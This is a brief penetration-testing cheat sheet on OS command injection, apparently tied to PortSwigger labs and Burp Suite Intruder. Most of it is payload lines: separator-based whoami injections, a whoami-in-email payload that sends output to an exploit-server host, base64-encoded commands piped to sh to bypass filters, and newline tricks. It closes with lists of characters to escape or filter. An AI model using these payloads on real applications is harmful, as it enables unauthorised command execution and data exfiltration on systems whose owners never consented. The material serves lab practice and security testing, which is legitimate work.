In command injection testing testers will try to inject an OS command through an HTTP request into the application. An OS Command Injection attack breaks the following pattern:
Input -> OS Command == OS Command Injection
Testing
- Send the request to the Intruder module in Burp Suite.
- Use this list (SecLists on GitHub) as the payload.
%0A is the newline character.
%0Awhoami
; whoami
& whoami
`whoami`
&& whoami
$(whoami)
| whoami
|| whoamiExamples
In email address input
Use exploit server from PortSwigger labs 😉 You can use this lab.
$(whoami)@<EXPLOIT SERVER ID>.exploit-server.netExamples when some characters are not allowed
Execute “ls -l”
base64 -d <<< bHMgLWwgLwo= | sh
$(base64 -d <<< bHMgLWwgLwo=)Add new line
$(<%0a127.0.0.1) # %0a: new line
$(<%0d127.0.0.1) # %0d: carriage returnExamples “ping”
command=ping -c 5 IP127.0.0.1%0awhoamicommand=ping -c 5
{ } ( ) > < * | = ? ; [ ] $ # ~ ! . % / \ : , `
Escape or filter special characters for windows
( ) < > & * ‘ | = ? ; [ ] ^ ~ ! . ” % @ / \ : + , `
Escape or filter special characters for Linux
{ } ( ) > < & * ‘ | = ? ; [ ] $ – # ~ ! . ” % / \ : + , `